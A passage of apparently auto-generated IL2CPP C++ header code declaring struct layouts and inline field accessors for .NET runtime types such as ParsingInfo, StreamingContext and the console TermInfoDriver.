} inline void set_fUseHour12_3(bool value) { ___fUseHour12_3 = value; } inline static int32_t get_offset_of_fUseTwoDigitYear_4() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___fUseTwoDigitYear_4)); } inline bool get_fUseTwoDigitYear_4() const { return ___fUseTwoDigitYear_4; } inline bool* get_address_of_fUseTwoDigitYear_4() { return &___fUseTwoDigitYear_4; } inline void set_fUseTwoDigitYear_4(bool value) { ___fUseTwoDigitYear_4 = value; } inline static int32_t get_offset_of_fAllowInnerWhite_5() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___fAllowInnerWhite_5)); } inline bool get_fAllowInnerWhite_5() const { return ___fAllowInnerWhite_5; } inline bool* get_address_of_fAllowInnerWhite_5() { return &___fAllowInnerWhite_5; } inline void set_fAllowInnerWhite_5(bool value) { ___fAllowInnerWhite_5 = value; } inline static int32_t get_offset_of_fAllowTrailingWhite_6() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___fAllowTrailingWhite_6)); } inline bool get_fAllowTrailingWhite_6() const { return ___fAllowTrailingWhite_6; } inline bool* get_address_of_fAllowTrailingWhite_6() { return &___fAllowTrailingWhite_6; } inline void set_fAllowTrailingWhite_6(bool value) { ___fAllowTrailingWhite_6 = value; } inline static int32_t get_offset_of_fCustomNumberParser_7() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___fCustomNumberParser_7)); } inline bool get_fCustomNumberParser_7() const { return ___fCustomNumberParser_7; } inline bool* get_address_of_fCustomNumberParser_7() { return &___fCustomNumberParser_7; } inline void set_fCustomNumberParser_7(bool value) { ___fCustomNumberParser_7 = value; } inline static int32_t get_offset_of_parseNumberDelegate_8() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___parseNumberDelegate_8)); } inline MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * get_parseNumberDelegate_8() const { return ___parseNumberDelegate_8; } inline MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D ** get_address_of_parseNumberDelegate_8() { return &___parseNumberDelegate_8; } inline void set_parseNumberDelegate_8(MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * value) { ___parseNumberDelegate_8 = value; Il2CppCodeGenWriteBarrier((&___parseNumberDelegate_8), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.ParsingInfo struct ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7_marshaled_pinvoke { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_0; int32_t ___dayOfWeek_1; int32_t ___timeMark_2; int32_t ___fUseHour12_3; int32_t ___fUseTwoDigitYear_4; int32_t ___fAllowInnerWhite_5; int32_t ___fAllowTrailingWhite_6; int32_t ___fCustomNumberParser_7; Il2CppMethodPointer ___parseNumberDelegate_8; }; // Native definition for COM marshalling of System.ParsingInfo struct ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7_marshaled_com { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_0; int32_t ___dayOfWeek_1; int32_t ___timeMark_2; int32_t ___fUseHour12_3; int32_t ___fUseTwoDigitYear_4; int32_t ___fAllowInnerWhite_5; int32_t ___fAllowTrailingWhite_6; int32_t ___fCustomNumberParser_7; Il2CppMethodPointer ___parseNumberDelegate_8; }; #endif // PARSINGINFO_T7E92EB1D56110F024979E1E497A675BC596BA7B7_H #ifndef RUNTIMEASSEMBLY_T5EE9CD749D82345AE5635B9665665C31A3308EB1_H #define RUNTIMEASSEMBLY_T5EE9CD749D82345AE5635B9665665C31A3308EB1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Reflection.RuntimeAssembly struct RuntimeAssembly_t5EE9CD749D82345AE5635B9665665C31A3308EB1 : public Assembly_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMEASSEMBLY_T5EE9CD749D82345AE5635B9665665C31A3308EB1_H #ifndef STREAMINGCONTEXT_T2CCDC54E0E8D078AF4A50E3A8B921B828A900034_H #define STREAMINGCONTEXT_T2CCDC54E0E8D078AF4A50E3A8B921B828A900034_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Runtime.Serialization.StreamingContext struct StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 { public: // System.Object System.Runtime.Serialization.StreamingContext::m_additionalContext RuntimeObject * ___m_additionalContext_0; // System.Runtime.Serialization.StreamingContextStates System.Runtime.Serialization.StreamingContext::m_state int32_t ___m_state_1; public: inline static int32_t get_offset_of_m_additionalContext_0() { return static_cast<int32_t>(offsetof(StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034, ___m_additionalContext_0)); } inline RuntimeObject * get_m_additionalContext_0() const { return ___m_additionalContext_0; } inline RuntimeObject ** get_address_of_m_additionalContext_0() { return &___m_additionalContext_0; } inline void set_m_additionalContext_0(RuntimeObject * value) { ___m_additionalContext_0 = value; Il2CppCodeGenWriteBarrier((&___m_additionalContext_0), value); } inline static int32_t get_offset_of_m_state_1() { return static_cast<int32_t>(offsetof(StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034, ___m_state_1)); } inline int32_t get_m_state_1() const { return ___m_state_1; } inline int32_t* get_address_of_m_state_1() { return &___m_state_1; } inline void set_m_state_1(int32_t value) { ___m_state_1 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Runtime.Serialization.StreamingContext struct StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034_marshaled_pinvoke { Il2CppIUnknown* ___m_additionalContext_0; int32_t ___m_state_1; }; // Native definition for COM marshalling of System.Runtime.Serialization.StreamingContext struct StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034_marshaled_com { Il2CppIUnknown* ___m_additionalContext_0; int32_t ___m_state_1; }; #endif // STREAMINGCONTEXT_T2CCDC54E0E8D078AF4A50E3A8B921B828A900034_H #ifndef TERMINFODRIVER_T9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_H #define TERMINFODRIVER_T9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TermInfoDriver struct TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 : public RuntimeObject { public: // System.TermInfoReader System.TermInfoDriver::reader TermInfoReader_tCAABF3484E6F0AA298F809766C52CA9DC4E6C55C * ___reader_3; // System.Int32 System.TermInfoDriver::cursorLeft int32_t ___cursorLeft_4; // System.Int32 System.TermInfoDriver::cursorTop int32_t ___cursorTop_5; // System.String System.TermInfoDriver::title String_t* ___title_6; // System.String System.TermInfoDriver::titleFormat String_t* ___titleFormat_7; // System.Boolean System.TermInfoDriver::cursorVisible bool ___cursorVisible_8; // System.String System.TermInfoDriver::csrVisible String_t* ___csrVisible_9; // System.String System.TermInfoDriver::csrInvisible String_t* ___csrInvisible_10; // System.String System.TermInfoDriver::clear String_t* ___clear_11; // System.String System.TermInfoDriver::bell String_t* ___bell_12; // System.String System.TermInfoDriver::term String_t* ___term_13; // System.IO.StreamReader System.TermInfoDriver::stdin StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * ___stdin_14; // System.IO.CStreamWriter System.TermInfoDriver::stdout CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * ___stdout_15; // System.Int32 System.TermInfoDriver::windowWidth int32_t ___windowWidth_16; // System.Int32 System.TermInfoDriver::windowHeight int32_t ___windowHeight_17; // System.Int32 System.TermInfoDriver::bufferHeight int32_t ___bufferHeight_18; // System.Int32 System.TermInfoDriver::bufferWidth int32_t ___bufferWidth_19; // System.Char[] System.TermInfoDriver::buffer CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___buffer_20; // System.Int32 System.TermInfoDriver::readpos int32_t ___readpos_21; // System.Int32 System.TermInfoDriver::writepos int32_t ___writepos_22; // System.String System.TermInfoDriver::keypadXmit String_t* ___keypadXmit_23; // System.String System.TermInfoDriver::keypadLocal String_t* ___keypadLocal_24; // System.Boolean System.TermInfoDriver::inited bool ___inited_25; // System.Object System.TermInfoDriver::initLock RuntimeObject * ___initLock_26; // System.Boolean System.TermInfoDriver::initKeys bool ___initKeys_27; // System.String System.TermInfoDriver::origPair String_t* ___origPair_28; // System.String System.TermInfoDriver::origColors String_t* ___origColors_29; // System.String System.TermInfoDriver::cursorAddress String_t* ___cursorAddress_30; // System.ConsoleColor System.TermInfoDriver::fgcolor int32_t ___fgcolor_31; // System.String System.TermInfoDriver::setfgcolor String_t* ___setfgcolor_32; // System.String System.TermInfoDriver::setbgcolor String_t* ___setbgcolor_33; // System.Int32 System.TermInfoDriver::maxColors int32_t ___maxColors_34; // System.Boolean System.TermInfoDriver::noGetPosition bool ___noGetPosition_35; // System.Collections.Hashtable System.TermInfoDriver::keymap Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * ___keymap_36; // System.ByteMatcher System.TermInfoDriver::rootmap ByteMatcher_tB199BDD35E2575B84D9FDED34954705653D241DC * ___rootmap_37; // System.Int32 System.TermInfoDriver::rl_startx int32_t ___rl_startx_38; // System.Int32 System.TermInfoDriver::rl_starty int32_t ___rl_starty_39; // System.Byte[] System.TermInfoDriver::control_characters ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___control_characters_40; // System.Char[] System.TermInfoDriver::echobuf CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___echobuf_42; // System.Int32 System.TermInfoDriver::echon int32_t ___echon_43; public: inline static int32_t get_offset_of_reader_3() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___reader_3)); } inline TermInfoReader_tCAABF3484E6F0AA298F809766C52CA9DC4E6C55C * get_reader_3() const { return ___reader_3; } inline TermInfoReader_tCAABF3484E6F0AA298F809766C52CA9DC4E6C55C ** get_address_of_reader_3() { return &___reader_3; } inline void set_reader_3(TermInfoReader_tCAABF3484E6F0AA298F809766C52CA9DC4E6C55C * value) { ___reader_3 = value; Il2CppCodeGenWriteBarrier((&___reader_3), value); } inline static int32_t get_offset_of_cursorLeft_4() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___cursorLeft_4)); } inline int32_t get_cursorLeft_4() const { return ___cursorLeft_4; } inline int32_t* get_address_of_cursorLeft_4() { return &___cursorLeft_4; } inline void set_cursorLeft_4(int32_t value) { ___cursorLeft_4 = value; } inline static int32_t get_offset_of_cursorTop_5() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___cursorTop_5)); } inline int32_t get_cursorTop_5() const { return ___cursorTop_5; } inline int32_t* get_address_of_cursorTop_5() { return &___cursorTop_5; } inline void set_cursorTop_5(int32_t value) { ___cursorTop_5 = value; } inline static int32_t get_offset_of_title_6() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___title_6)); } inline String_t* get_title_6() const { return ___title_6; } inline String_t** get_address_of_title_6() { return &___title_6; } inline void set_title_6(String_t* value) { ___title_6 = value; Il2CppCodeGenWriteBarrier((&___title_6), value); } inline static int32_t get_offset_of_titleFormat_7() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___titleFormat_7)); } inline String_t* get_titleFormat_7() const { return ___titleFormat_7; } inline String_t** get_address_of_titleFormat_7() { return &___titleFormat_7; } inline void set_titleFormat_7(String_t* value) { ___titleFormat_7 = value; Il2CppCodeGenWriteBarrier((&___titleFormat_7), value); } inline static int32_t get_offset_of_cursorVisible_8() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___cursorVisible_8)); } inline bool get_cursorVisible_8() const { return ___cursorVisible_8; } inline bool* get_address_of_cursorVisible_8() { return &___cursorVisible_8; } inline void set_cursorVisible_8(bool value) { ___cursorVisible_8 = value; } inline static int32_t get_offset_of_csrVisible_9() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___csrVisible_9)); } inline String_t* get_csrVisible_9() const { return ___csrVisible_9; } inline String_t** get_address_of_csrVisible_9() { return &___csrVisible_9; } inline void set_csrVisible_9(String_t* value) { ___csrVisible_9 = value; Il2CppCodeGenWriteBarrier((&___csrVisible_9), value); } inline static int32_t get_offset_of_csrInvisible_10() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___csrInvisible_10)); } inline String_t* get_csrInvisible_10() const { return ___csrInvisible_10; } inline String_t** get_address_of_csrInvisible_10() { return &___csrInvisible_10; } inline void set_csrInvisible_10(String_t* value) { ___csrInvisible_10 = value; Il2CppCodeGenWriteBarrier((&___csrInvisible_10), value); } inline static int32_t get_offset_of_clear_11() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___clear_11)); } inline String_t* get_clear_11() const { return ___clear_11; } inline String_t** get_address_of_clear_11() { return &___clear_11; } inline void set_clear_11(String_t* value) { ___clear_11 = value; Il2CppCodeGenWriteBarrier((&___clear_11), value); } inline static int32_t get_offset_of_bell_12() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___bell_12)); } inline String_t* get_bell_12() const { return ___bell_12; } inline String_t** get_address_of_bell_12() { return &___bell_12; } inline void set_bell_12(String_t* value) { ___bell_12 = value; Il2CppCodeGenWriteBarrier((&___bell_12), value); } inline static int32_t get_offset_of_term_13() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___term_13)); } inline String_t* get_term_13() const { return ___term_13; } inline String_t** get_address_of_term_13() { return &___term_13; } inline void set_term_13(String_t* value) { ___term_13 = value; Il2CppCodeGenWriteBarrier((&___term_13), value); } inline static int32_t get_offset_of_stdin_14() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___stdin_14)); } inline StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * get_stdin_14() const { return ___stdin_14; } inline StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E ** get_address_of_stdin_14() { return &___stdin_14; } inline void set_stdin_14(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * value) { ___stdin_14 = value; Il2CppCodeGenWriteBarrier((&___stdin_14), value); } inline static int32_t get_offset_of_stdout_15() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___stdout_15)); } inline CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * get_stdout_15() const { return ___stdout_15; } inline CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 ** get_address_of_stdout_15() { return &___stdout_15; } inline void set_stdout_15(CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * value) { ___stdout_15 = value; Il2CppCodeGenWriteBarrier((&___stdout_15), value); } inline static int32_t get_offset_of_windowWidth_16() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___windowWidth_16)); } inline int32_t get_windowWidth_16() const { return ___windowWidth_16; } inline int32_t* get_address_of_windowWidth_16() { return &___windowWidth_16; } inline void set_windowWidth_16(int32_t value) { ___windowWidth_16 = value; } inline static int32_t get_offset_of_windowHeight_17() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___windowHeight_17)); } inline int32_t get_windowHeight_17() const { return ___windowHeight_17; } inline int32_t* get_address_of_windowHeight_17() { return &___windowHeight_17; } inline void set_windowHeight_17(int32_t value) { ___windowHeight_17 = value; } inline static int32_t get_offset_of_bufferHeight_18() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___bufferHeight_18)); } inline int32_t get_bufferHeight_18() const { return ___bufferHeight_18; } inline int32_t* get_address_of_bufferHeight_18() { return &___bufferHeight_18; } inline void set_bufferHeight_18(int32_t value) { ___bufferHeight_18 = value; } inline static int32_t get_offset_of_bufferWidth_19() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___bufferWidth_19)); } inline int32_t get_bufferWidth_19() const { return ___bufferWidth_19; } inline int32_t* get_address_of_bufferWidth_19() { return &___bufferWidth_19; } inline void set_bufferWidth_19(int32_t value) { ___bufferWidth_19 = value; } inline static int32_t get_offset_of_buffer_20() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___buffer_20)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_buffer_20() const { return ___buffer_20; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_buffer_20() { return &___buffer_20; } inline void set_buffer_20(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___buffer_20 = value; Il2CppCodeGenWriteBarrier((&___buffer_20), value); } inline static int32_t get_offset_of_readpos_21() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___readpos_21)); } inline int32_t get_readpos_21() const { return ___readpos_21; } inline int32_t* get_address_of_readpos_21() { return &___readpos_21; } inline void set_readpos_21(int32_t value) { ___readpos_21 = value; } inline static int32_t get_offset_of_writepos_22() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___writepos_22)); } inline int32_t get_writepos_22() const { return ___writepos_22; } inline int32_t* get_address_of_writepos_22() { return &___writepos_22; } inline void set_writepos_22(int32_t value) { ___writepos_22 = value; } inline static int32_t get_offset_of_keypadXmit_23() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___keypadXmit_23)); } inline String_t* get_keypadXmit_23() const { return ___keypadXmit_23; } inline String_t** get_address_of_keypadXmit_23() { return &___keypadXmit_23; } inline void set_keypadXmit_23(String_t* value) { ___keypadXmit_23 = value; Il2CppCodeGenWriteBarrier((&___keypadXmit_23), value); } inline static int32_t get_offset_of_keypadLocal_24() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___keypadLocal_24)); } inline String_t* get_keypadLocal_24() const { return ___keypadLocal_24; } inline String_t** get_address_of_keypadLocal_24() { return &___keypadLocal_24; } inline void set_keypadLocal_24(String_t* value) { ___keypadLocal_24 = value; Il2CppCodeGenWriteBarrier((&___keypadLocal_24), value); } inline static int32_t get_offset_of_inited_25() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___inited_25)); } inline bool get_inited_25() const { return ___inited_25; } inline bool* get_address_of_inited_25() { return &___inited_25; } inline void set_inited_25(bool value) { ___inited_25 = value; } inline static int32_t get_offset_of_initLock_26() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___initLock_26)); } inline RuntimeObject * get_initLock_26() const { return ___initLock_26; } inline RuntimeObject ** get_address_of_initLock_26() { return &___initLock_26; } inline void set_initLock_26(RuntimeObject * value) { ___initLock_26 = value; Il2CppCodeGenWriteBarrier((&___initLock_26), value); } inline static int32_t get_offset_of_initKeys_27() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___initKeys_27)); } inline bool get_initKeys_27() const { return ___initKeys_27; } inline bool* get_address_of_initKeys_27() { return &___initKeys_27; } inline void set_initKeys_27(bool value) { ___initKeys_27 = value; } inline static int32_t get_offset_of_origPair_28() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___origPair_28)); } inline String_t* get_origPair_28() const { return ___origPair_28; } inline String_t** get_address_of_origPair_28() { return &___origPair_28; } inline void set_origPair_28(String_t* value) { ___origPair_28 = value; Il2CppCodeGenWriteBarrier((&___origPair_28), value); } inline static int32_t get_offset_of_origColors_29() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___origColors_29)); } inline String_t* get_origColors_29() const { return ___origColors_29; } inline String_t** get_address_of_origColors_29() { return &___origColors_29; } inline void set_origColors_29(String_t* value) { ___origColors_29 = value; Il2CppCodeGenWriteBarrier((&___origColors_29), value); } inline static int32_t get_offset_of_cursorAddress_30() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___cursorAddress_30)); } inline String_t* get_cursorAddress_30() const { return ___cursorAddress_30; } inline String_t** get_address_of_cursorAddress_30() { return &___cursorAddress_30; } inline void set_cursorAddress_30(String_t* value) { ___cursorAddress_30 = value; Il2CppCodeGenWriteBarrier((&___cursorAddress_30), value); } inline static int32_t get_offset_of_fgcolor_31() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___fgcolor_31)); } inline int32_t get_fgcolor_31() const { return ___fgcolor_31; } inline int32_t* get_address_of_fgcolor_31() { return &___fgcolor_31; } inline void set_fgcolor_31(int32_t value) { ___fgcolor_31 = value; } inline static int32_t get_offset_of_setfgcolor_32() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___setfgcolor_32)); } inline String_t* get_setfgcolor_32() const { return ___setfgcolor_32; } inline String_t** get_address_of_setfgcolor_32() { return &___setfgcolor_32; } inline void set_setfgcolor_32(String_t* value) { ___setfgcolor_32 = value; Il2CppCodeGenWriteBarrier((&___setfgcolor_32), value); } inline static int32_t get_offset_of_setbgcolor_33() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___setbgcolor_33)); } inline String_t* get_setbgcolor_33() const { return ___setbgcolor_33; } inline String_t** get_address_of_setbgcolor_33() { return &___setbgcolor_33; } inline void set_setbgcolor_33(String_t* value) { ___setbgcolor_33 = value; Il2CppCodeGenWriteBarrier((&___setbgcolor_33), value); } inline static int32_t get_offset_of_maxColors_34() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___maxColors_34)); } inline int32_t get_maxColors_34() const { return ___maxColors_34; } inline int32_t* get_address_of_maxColors_34() { return &___maxColors_34; } inline void set_maxColors_34(int32_t value) { ___maxColors_34 = value; } inline static int32_t get_offset_of_noGetPosition_35() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___noGetPosition_35)); } inline bool get_noGetPosition_35() const { return ___noGetPosition_35; } inline bool* get_address_of_noGetPosition_35() { return &___noGetPosition_35; } inline void set_noGetPosition_35(bool value) { ___noGetPosition_35 = value; } inline static int32_t get_offset_of_keymap_36() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___keymap_36)); } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * get_keymap_36() const { return ___keymap_36; } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 ** get_address_of_keymap_36() { return &___keymap_36; } inline void set_keymap_36(Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * value) { ___keymap_36 = value; Il2CppCodeGenWriteBarrier((&___keymap_36), value); } inline static int32_t get_offset_of_rootmap_37() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___rootmap_37)); } inline ByteMatcher_tB199BDD35E2575B84D9FDED34954705653D241DC * get_rootmap_37() const { return ___rootmap_37; } inline ByteMatcher_tB199BDD35E2575B84D9FDED34954705653D241DC ** get_address_of_rootmap_37() { return &___rootmap_37; } inline void set_rootmap_37(ByteMatcher_tB199BDD35E2575B84D9FDED34954705653D241DC * value) { ___rootmap_37 = value; Il2CppCodeGenWriteBarrier((&___rootmap_37), value); } inline static int32_t get_offset_of_rl_startx_38() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___rl_startx_38)); } inline int32_t get_rl_startx_38() const { return ___rl_startx_38; } inline int32_t* get_address_of_rl_startx_38() { return &___rl_startx_38; } inline void set_rl_startx_38(int32_t value) { ___rl_startx_38 = value; } inline static int32_t get_offset_of_rl_starty_39() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___rl_starty_39)); } inline int32_t get_rl_starty_39() const { return ___rl_starty_39; } inline int32_t* get_address_of_rl_starty_39() { return &___rl_starty_39; } inline void set_rl_starty_39(int32_t value) { ___rl_starty_39 = value; } inline static int32_t get_offset_of_control_characters_40() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___control_characters_40)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_control_characters_40() const { return ___control_characters_40; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_control_characters_40() { return &___control_characters_40; } inline void set_control_characters_40(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___control_characters_40 = value; Il2CppCodeGenWriteBarrier((&___control_characters_40), value); } inline static int32_t get_offset_of_echobuf_42() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___echobuf_42)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_echobuf_42() const { return ___echobuf_42; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_echobuf_42() { return &___echobuf_42; } inline void set_echobuf_42(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___echobuf_42 = value; Il2CppCodeGenWriteBarrier((&___echobuf_42), value); } inline static int32_t get_offset_of_echon_43() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653, ___echon_43)); } inline int32_t get_echon_43() const { return ___echon_43; } inline int32_t* get_address_of_echon_43() { return &___echon_43; } inline void set_echon_43(int32_t value) { ___echon_43 = value; } }; struct TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_StaticFields { public: // System.Int32* System.TermInfoDriver::native_terminal_size int32_t* ___native_terminal_size_0; // System.Int32 System.TermInfoDriver::terminal_size int32_t ___terminal_size_1; // System.String[] System.TermInfoDriver::locations StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___locations_2; // System.Int32[] System.TermInfoDriver::_consoleColorToAnsiCode Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* ____consoleColorToAnsiCode_41; public: inline static int32_t get_offset_of_native_terminal_size_0() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_StaticFields, ___native_terminal_size_0)); } inline int32_t* get_native_terminal_size_0() const { return ___native_terminal_size_0; } inline int32_t** get_address_of_native_terminal_size_0() { return &___native_terminal_size_0; } inline void set_native_terminal_size_0(int32_t* value) { ___native_terminal_size_0 = value; } inline static int32_t get_offset_of_terminal_size_1() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_StaticFields, ___terminal_size_1)); } inline int32_t get_terminal_size_1() const { return ___terminal_size_1; } inline int32_t* get_address_of_terminal_size_1() { return &___terminal_size_1; } inline void set_terminal_size_1(int32_t value) { ___terminal_size_1 = value; } inline static int32_t get_offset_of_locations_2() { return static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_StaticFields, ___locations_2)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_locations_2() const { return ___locations_2; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_locations_2() { return &___locations_2; } inline void set_locations_2(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___locations_2 = value; Il2CppCodeGenWriteBarrier((&___locations_2), value); } inline static int32_t get_offset_of__consoleColorToAnsiCode_41() { return 